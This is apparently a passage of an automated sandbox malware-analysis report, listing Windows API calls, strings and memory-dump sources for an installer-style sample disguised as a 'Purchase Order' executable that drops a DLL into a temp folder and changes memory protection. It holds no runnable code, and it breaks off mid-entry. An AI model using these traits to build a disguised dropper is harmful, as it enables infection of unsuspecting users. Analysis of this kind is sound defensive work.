                                              • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,?,00000000), ref: 00405E76
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,00403344,00000000,00000000,00403168,?,?,00000000,00000000,00000000), ref: 00405E47
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              APIs
                                              • VirtualProtect.KERNELBASE(7012405C,?,?,7012404C), ref: 701229B5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              APIs
                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: PrivateProfileString
                                              • String ID:
                                              • API String ID: 1096422788-0
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,004061B5,0042C228,00000000,?,?,Call,?), ref: 0040614B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              APIs
                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,?,0000000A), ref: 00403355
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              APIs
                                              • SendMessageW.USER32(?,?,00000001,00404091), ref: 00404274
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              APIs
                                              • ShellExecuteExW.SHELL32(?), ref: 004058F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID:
                                              • API String ID: 587946157-0
                                              APIs
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,755723A0), ref: 0040537D
                                                • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                • Part of subcall function 004058A3: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                • Part of subcall function 004058A3: CloseHandle.KERNEL32(?), ref: 004058D9
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                • Part of subcall function 00406745: WaitForSingleObject.KERNEL32(?,?), ref: 00406756
                                                • Part of subcall function 00406745: GetExitCodeProcess.KERNEL32(?,?), ref: 00406778
                                                • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                              • String ID:
                                              • API String ID: 2972824698-0
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                              • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                              • GetClientRect.USER32(?,?), ref: 0040550B
                                              • GetSystemMetrics.USER32(00000002), ref: 00405512
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                              • ShowWindow.USER32(?,?), ref: 004055AE
                                              • GetDlgItem.USER32(?,?), ref: 004055CF
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                              • GetDlgItem.USER32(?,?), ref: 004054DD
                                                • Part of subcall function 00404266: SendMessageW.USER32(?,?,00000001,00404091), ref: 00404274
                                              • GetDlgItem.USER32(?,?), ref: 00405621
                                              • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                              • CloseHandle.KERNEL32(00000000), ref: 00405636
                                              • ShowWindow.USER32(00000000), ref: 0040565A
                                              • ShowWindow.USER32(?,?), ref: 0040565F
                                              • ShowWindow.USER32(?), ref: 004056A9
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                              • CreatePopupMenu.USER32 ref: 004056EE
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                              • GetWindowRect.USER32(?,?), ref: 00405722
                                              • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040573B
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                              • OpenClipboard.USER32(00000000), ref: 00405783
                                              • EmptyClipboard.USER32 ref: 00405789
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                              • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                              • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                              • CloseClipboard.USER32 ref: 004057E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 590372296-366298937
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                              • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                              • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                              • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                              • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,?,004048DE), ref: 00405917
                                                • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065B1
                                                • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004065C0
                                                • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065C5
                                                • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065D8
                                              • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$Call
                                              • API String ID: 2624150263-3993347796
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: p!C$p!C
                                              • API String ID: 0-3125587631
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                              • GetDlgItem.USER32(?,?), ref: 004044A2
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                              • GetSysColor.USER32(?), ref: 004044D0
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                              • lstrlenW.KERNEL32(?), ref: 004044F1
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                              • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                              • SendMessageW.USER32(00000000), ref: 00404573
                                              • GetDlgItem.USER32(?,?), ref: 0040459E
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                              • SetCursor.USER32(00000000), ref: 004045F2
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                              • SetCursor.USER32(00000000), ref: 0040460E
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                              • SendMessageW.USER32(?,00000000,00000000), ref: 0040464F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                              • String ID: Call$N$gC@
                                              • API String ID: 3103080414-2733886405
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                              • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                              • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                              • wsprintfA.USER32 ref: 00405F85
                                              • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,?,004310E8,?,?,?,?,?), ref: 00405FC0
                                              • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405FCF
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                              • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                                • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                              • String ID: %ls=%ls$[Rename]
                                              • API String ID: 2171350718-461813615
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065B1
                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004065C0
                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065C5
                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065D8
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                              • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 0040654E
                                              • *?|<>/":, xrefs: 004065A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-3507125664
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                              • GetSysColor.USER32(00000000), ref: 004042F3
                                              • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                              • SetBkMode.GDI32(?,?), ref: 0040430B
                                              • GetSysColor.USER32(?), ref: 0040431E
                                              • SetBkColor.GDI32(?,?), ref: 0040432E
                                              • DeleteObject.GDI32(?), ref: 00404348
                                              • CreateBrushIndirect.GDI32(?), ref: 00404352
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              APIs
                                              • lstrlenW.KERNEL32(0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                              • lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                              • lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,755723A0), ref: 0040537D
                                              • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID:
                                              • API String ID: 2531174081-0
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                              • GetMessagePos.USER32 ref: 00404C0F
                                              • ScreenToClient.USER32(?,?), ref: 00404C29
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                              • MulDiv.KERNEL32(000B0B69,?,000B0D6D), ref: 00402E3C
                                              • wsprintfW.USER32 ref: 00402E4C
                                              • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                              Strings
                                              • verifying installer: %d%%, xrefs: 00402E46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: verifying installer: %d%%
                                              • API String ID: 1451636040-82062127
                                              APIs
                                                • Part of subcall function 7012121B: GlobalAlloc.KERNEL32(?,?,7012123B,?,701212DF,00000019,701211BE,-000000A0), ref: 70121225
                                              • GlobalFree.KERNEL32(?), ref: 7012265B
                                              • GlobalFree.KERNEL32(00000000), ref: 70122690
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              APIs
                                                • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                                • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                              • GlobalAlloc.KERNEL32(?,?), ref: 00402901
                                              • CloseHandle.KERNEL32(?), ref: 00402981
                                                • Part of subcall function 00403347: SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,?,0000000A), ref: 00403355
                                              • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040291D
                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                • Part of subcall function 00403116: GetTickCount.KERNEL32 ref: 00403180
                                                • Part of subcall function 00403116: GetTickCount.KERNEL32 ref: 00403227
                                                • Part of subcall function 00403116: MulDiv.KERNEL32(7FFFFFFF,?,00000000), ref: 00403250
                                                • Part of subcall function 00403116: wsprintfW.USER32 ref: 00403263
                                              • DeleteFileW.KERNEL32(?), ref: 00402995
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                              • String ID:
                                              • API String ID: 2082585436-0
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsh5948.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll,?,?,?,00000021), ref: 004025E8
                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsh5948.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll,?,?,?,00000021), ref: 004025F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: ByteCharMultiWidelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh5948.tmp$C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll
                                              • API String ID: 3109718747-2432596853
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              Similarity
                                              • API ID: FreeGlobal
                                              • String ID:
                                              • API String ID: 2979337801-0
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 701224DA
                                                • Part of subcall function 7012122C: lstrcpynW.KERNEL32(00000000,?,701212DF,00000019,701211BE,-000000A0), ref: 7012123C
                                              • GlobalAlloc.KERNEL32(?), ref: 70122460
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7012247B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              Similarity
                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                              • String ID:
                                              • API String ID: 4216380887-0
                                              APIs
                                              • GetDC.USER32(?), ref: 00401DBC
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                              • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID:
                                              • API String ID: 3808545654-0
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,701221F0,?,00000808), ref: 70121639
                                              • GlobalAlloc.KERNEL32(?,00000000,?,00000000,701221F0,?,00000808), ref: 70121640
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,701221F0,?,00000808), ref: 70121654
                                              • GetProcAddress.KERNEL32(701221F0,00000000), ref: 7012165B
                                              • GlobalFree.KERNEL32(00000000), ref: 70121664
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              Similarity
                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                              • String ID:
                                              • API String ID: 1148316912-0
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
